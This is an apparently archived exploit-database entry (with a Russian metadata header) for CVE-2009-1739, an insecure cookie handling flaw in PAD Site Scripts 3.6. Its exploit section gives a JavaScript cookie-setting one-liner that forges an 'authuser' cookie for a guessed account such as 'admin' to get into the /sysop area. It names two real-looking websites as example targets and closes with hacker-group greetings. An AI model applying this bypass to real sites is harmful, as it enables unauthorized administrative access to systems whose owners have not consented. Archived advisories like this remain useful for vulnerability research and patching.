Exploit PAD Site Scripts 3.6 - Insecure Cookie Handling

[Exploiter]

EDB-ID

8735

Проверка EDB

1. Пройдено

Автор

MR.TRO0OQY

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2009-1739

Дата публикации

2009-05-19

=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :PAD Site Scripts v3.6 Insecure Cookie Handling Vulnerability

[+] Found by : Mr.tro0oqy  
   
[+] C0ntact : [email protected] <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
--------
javascript:document.cookie="authuser=[demo];path=/";

[demo]= Guess the username to the login

demo:
-----
Username for this site 'demo'

javascript:document.cookie="authuser=demo;path=/";

http://demo.pad-site-scripts.com/sysop

demo2:
------
Username for this site 'admin'

javascript:document.cookie="authuser=admin;path=/";

http://www.unlimitedpcdownloads.com/sysop/


=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================
ThE g0bL!N - spyboy - red virus - virus_hima - Red-D3v1L
Cyb3r-DeViL- OXIDE

Syriahacker.net [ArAb Acadmy Security]  

all my Friends

# milw0rm.com [2009-05-19]